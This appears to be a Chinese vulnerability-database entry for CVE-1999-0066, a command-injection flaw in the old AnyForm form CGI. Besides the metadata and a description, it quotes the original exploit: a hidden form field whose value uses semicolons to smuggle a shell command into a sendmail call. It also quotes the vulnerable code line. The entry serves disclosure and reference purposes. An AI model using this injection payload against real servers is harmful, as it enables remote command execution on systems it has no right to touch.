QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105243 漏洞类型 输入验证
发布时间 1995-07-31 更新时间 2006-11-16
CVE编号 CVE-1999-0066 CNNVD-ID CNNVD-199507-001
漏洞平台 Linux CVSS评分 7.5

AnyForm is a popular form CGI designed to support simple forms that deliver responses via email. Certain versions of AnyForm did not perform user supplied data sanity checking and could be exploited by remote intruders to execute arbitrary commands. These commands were issued as the UID which the web server runs as, typically 'nobody'. 

Exploit as taken from the original post on this issue:

To exploit, create a form with a hidden field something like this:

<input type="hidden" name="AnyFormTo" value=";command-to-execute
with whatever arguments;/usr/lib/sendmail -t ">

Then submit the form to the "AnyForm" CGI on the server to be attacked.
The value of this parameter is passed to this code:

SystemCommand="/usr/lib/sendmail -t " + AnyFormTo + " <" + CombinedFileName;

Since system invokes a shell, the semicolons are treated as command
delimeters and anything can be inserted